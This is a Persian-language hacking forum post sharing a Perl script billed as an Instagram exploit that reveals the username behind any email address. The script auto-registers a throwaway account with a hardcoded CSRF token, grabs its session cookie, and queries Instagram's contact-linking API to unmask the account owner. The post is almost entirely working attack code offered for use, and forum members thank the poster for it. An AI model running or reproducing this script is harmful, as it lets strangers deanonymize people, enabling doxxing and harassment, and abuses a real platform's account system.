انجمن تیم امنیتی ایران سایبر

Instagram Exploit] Get The Real Username By Email ]

شروع موضوع توسط root3r ‏4/2/18 در انجمن Vulnerability Laboratory

  1. لطفا فایل های خود را جهت ماندگاری در انجمن اپلود کنید در صورت مشاهده لینک اپلود خروجی , تاپیک حذف خواهد شد .
    بستن اطلاعیه
بستن اطلاعیه


درود مهمان گرامي؛

مهمان گرامي، براي مشاهده تالار با امکانات کامل ميبايست از طريق ايــن ليـــنک ثبت نام کنيد .

حامی مسابقات و برگزار کننده دوره های پیشرفته ارزیابی امنیت برای سازمان ها فتح پرچم (CTF)
  1. root3r
    مدیریت کل سایت

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏12/10/14
    ارسال ها:
    1,069
    تشکر شده:
    1,619
    جنسیت:
    شغل:
    Network Security
    محل سکونت:
    Iran
    Name:
    حسین
    Main os:
    Kali
    API Instagram Exploit - Get The Real Username By Email


    کد:
    #!usr/bin/perl
    ##################################
    # CoDed by 1337r00t
    #############
    # Now You Can Get The Real Username By Email [Instagram]
    #############
    # Tested on: Windows[CMD] ~ Linux[Parrot]
    # Date: 1/2/2018
    # Vendor Homepage: https://instagram.com/
    # Exploit Author: 1337r00t (@_1337r00t)
    ###############################################
    # X-MSG-To-Instagram: Nothing Good For you :( #
    ###############################################
    # Gz: ReYaM[RoRDeZ] - x03x - Dr.Abolalh - Lion Hacker - Evil~r00t -
    ##################################
    use LWP::UserAgent;
    ###############
    system('cls');
    print q(
    |------------------------|
    |      Priv8 Tool        |
    |------------------------|
    |       #Exploit#        |
    | Get Username By Email  |
    |     By 1337r00t        |
    |------------------------|
    |       Follow Me        |
    |~~~~~~~~~~~~~~~~~~~~~~~~|
    |  Twitter: @_1337r00t   |
    |  Instagram: @x1337r00t |
    |------------------------|
    You're So nice Today :} *** Instagram DuDe
    
    );#X-MSG-SKids: Don't Edit Anything
    print "Email => ";
    $mails = <STDIN>;
    chomp($mails);
    print "\n";
    # Ruuuuuun
    print email($mails);
    ##########33
    ###############
    sub email($){
        ($email) = @_;
        unlink 'sessionids.txt';
        $mail = 'a'.time.'@gmail.com';
        $pass = 'aaaaa2242';
        $user = 'a'.time.'a';
        print "\n-----\nStep 1 - Create Account To Get Username [Wait!..]\n-----\n";
        $sessions = LWP::UserAgent->new();
        $sessions->default_header('Referer'=>"https://www.instagram.com/");
        $sessions->default_header('X-CSRFToken'=>"KEG1ZgoSE7i4IGWIzqm20zCMqZAnx0OW");
        $sessions->default_header('Cookie'=>"csrftoken=KEG1ZgoSE7i4IGWIzqm20zCMqZAnx0OW;");
        $seesed = $sessions->post('https://www.instagram.com/accounts/web_create_ajax/',{email=>$mail,password=>$pass,username=>$user});
        $out = $seesed->header('Set-Cookie');
        if($out=~/sessionid/){
            print "Created :)\n\n-----\nStep 2 -  Get Username [Wait!...]\n-----\n";
            open(SESSION,">>sessionids.txt");
            print SESSION $seesed->header('Set-Cookie')=~/sessionid=(.+?);/;;
            close(SESSION);
            open (SESSIONFILE, "<sessionids.txt");
            @sessionids = <SESSIONFILE>;
            close SESSIONFILE;
            foreach $sessionid (@sessionids) {
            chomp $sessionid;
                $post = '[{"email_addresses":["'.$email.'"]}]';
                $getting = LWP::UserAgent->new();
                $getting->default_header('Cookie'=>"sessionid=$sessionid;");
                $getting->default_header('User-Agent'=>"Instagram 7.16.0 Android");
                $getted = $getting->post('https://i.instagram.com/api/v1/address_book/link/',{contacts=>$post});
                unlink 'sessionids.txt';
                if($getted->content=~/"pk"/){
                    print "\n-------------------\n";
                    print "Username: ";
                    return $getted->content=~/"username": "(.+?)"/;
                }else{
                    if($getted->content=~/"logout_reason": 3,/){
                        return "Sorry, Fail Step 2 Because 2FA, Plz Try Again Now !.";
                    }else{
                        return "Email -> ($email) Not Found :(";
                    }
                }
            }
        }else{
            return 'Sorry, Fail Step 1 Because Block Creating Accounts :( try later plz';
        }
    }
    
     
    Sir.h4m1D، n4ss1m، JOK3R و 8 نفر دیگر از این ارسال تشکر کرده اند.
بارگذاری...
به انجمن تخصصی امنیت ایران سایبر خوش آمدید . برای مشاهده تمامی تالار ها و امکانات ثبت نام کنید .